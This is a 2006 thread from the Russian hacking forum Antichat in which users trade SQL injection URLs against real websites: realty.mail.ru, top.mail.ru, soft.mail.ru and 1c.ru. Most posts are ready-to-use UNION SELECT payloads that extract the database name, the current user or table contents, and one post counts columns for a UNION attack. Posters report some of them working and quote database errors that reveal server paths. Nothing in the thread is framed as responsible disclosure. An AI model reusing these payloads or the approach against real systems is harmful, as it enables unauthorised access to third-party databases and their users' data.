ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Тема: Sql иньекция на Mail.ru!
  #1  
Старый 04.01.2006, 22:11
Аватар для xdx
xdx
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113

Репутация: 48
По умолчанию Тема: Sql иньекция на Mail.ru!


Последний раз редактировалось xdx; 04.01.2006 в 22:13..
 
Ответить с цитированием

  #2  
Старый 04.01.2006, 22:14
Аватар для xdx
xdx
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113

Репутация: 48
По умолчанию

или уш вот -) http://realty.mail.ru/main/sale/id_1'www.antichat.ru-FOREVA'/results.aspx
 
Ответить с цитированием

  #3  
Старый 04.01.2006, 22:18
Аватар для xdx
xdx
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113

Репутация: 48
По умолчанию

лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20selec t%20DB_NAME(1),CURRENT_USER--
 
Ответить с цитированием

  #4  
Старый 04.01.2006, 22:49
Аватар для xdx
xdx
Участник форума
Регистрация: 15.09.2005
Сообщений: 115
Провел на форуме:
495113

Репутация: 48
По умолчанию

Щас проверим
РАБОТАЕТ не так ссылку написал
http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20 DB_NAME(0),CURRENT_USER--

Вот работает
http://realty.mail.ru/main/sale/id_1'/results.aspx

после id_1 НАДО чтоб он написал ' а он не пишет

Последний раз редактировалось xdx; 04.01.2006 в 22:55..
 
Ответить с цитированием

  #5  
Старый 05.06.2006, 22:35
Аватар для Dagon
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию

вот нашел еще одну sql иньекцию в mail.ru

http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*
 
Ответить с цитированием

  #6  
Старый 01.07.2006, 02:37
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

SQL-INJECTION на soft.mail.ru.

Уязвимость в cookies на страницах:
Код:
index.php, interview_list.php, search_result_header.php, softclub-main.php.
Уязвимый параметр - OP_ID='.

Ошибка:
Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

  #7  
Старый 01.07.2006, 05:24
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

А что линк убрал?
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #8  
Старый 01.07.2006, 05:26
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dagon  
вот нашел еще одну sql иньекцию в mail.ru

http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM% 20pages/*
Я помню ещё с киборгом смотрели. Затряли на кодировке.
Цитата:
Failed to get record: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #9  
Старый 01.07.2006, 12:50
Аватар для ZaCo
ZaCo
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226

Репутация: 1332


По умолчанию

статью мою почитай
 
Ответить с цитированием

  #10  
Старый 01.07.2006, 17:31
Аватар для bul.666
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию

http://top.mail.ru/stat?url=999%27+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ